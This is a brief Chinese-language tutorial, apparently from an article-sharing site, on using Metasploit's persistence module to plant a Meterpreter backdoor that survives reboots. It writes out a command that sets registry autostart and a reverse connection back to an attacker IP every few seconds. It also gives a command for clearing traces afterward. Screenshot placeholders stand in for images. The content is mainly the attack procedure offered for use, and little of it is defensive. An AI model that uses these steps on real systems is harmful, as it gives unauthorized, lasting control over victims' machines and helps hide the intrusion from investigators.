Metasploit植入meterpreter持久后门

meterpreter的shellcode仅仅驻留在内存当中,那么当靶机重启,意味这我们会失去控制权,因此我们需要继续植入持久型的后门。

利用persistence后渗透攻击模块长期控制
Metasploit植入meterpreter持久后门_第1张图片

执行run persistence -X -i 5 -p 4567 -r 192.168.83.100 植入持久性后门,通过修改注册表达到自启动的目的,-i参数为方向连接间隔,-X表示选择开机自启动。

Metasploit植入meterpreter持久后门_第2张图片
与此同时,还生成了清理文件,可通过命令 run multi_console_command -r [文件路径]清除痕迹

你可能感兴趣的:(Metasploit植入meterpreter持久后门)